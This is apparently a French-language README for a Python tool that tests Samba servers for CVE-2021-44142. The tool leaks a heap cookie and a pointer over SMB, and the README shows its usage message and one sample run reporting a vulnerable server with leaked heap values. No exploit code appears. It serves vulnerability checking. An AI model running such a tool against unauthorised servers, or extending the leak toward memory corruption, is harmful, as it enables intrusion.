
Script Python pour détecter et exploiter CVE-2021-44142 dans les serveurs Samba, en extrayant le cookie de tas et le pointeur via une seule connexion SMB pour la vérification de vulnérabilité.
Un outil pour vérifier si un serveur Samba est vulnérable à CVE-2021-44142
CVE-2021-44142 est une lecture et une écriture hors limites du tas dans le module vfs_fruit de Samba, utilisée lors du Pwn2Own Austin 2021 contre le Western Digital PR4100. Elle a été découverte pour la première fois par Nguyễn Hoàng Thạch et Billy Jheng Bing-Jhong de STAR Labs. Orange Tsai de DEVCORE a également signalé cette vulnérabilité. Ce travail est basé sur un article de blog de 0xsha à l'adresse https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142.
Cet outil démontre la vulnérabilité à CVE-2021-44142 en extrayant un cookie de tas talloc et un pointeur de liste chaînée. Des techniques similaires peuvent être utilisées pour écrire ces données.
Ce travail s'appuie sur le travail de 0xsha en :
python check_vulnerable.py
usage: check_vulnerable.py [-h] [--password PASSWORD] server port share user
check_vulnerable.py: error: the following arguments are required: server, port, share, user
python check_vulnerable.py 192.168.1.183 445 TimeMachineBackup Guest
{
"vulnerable": true,
"heap_cookie_leak": "0xfc571370",
"heap_pointer_leak": "0x55e4e717b1b0",
"fail_reason": ""
}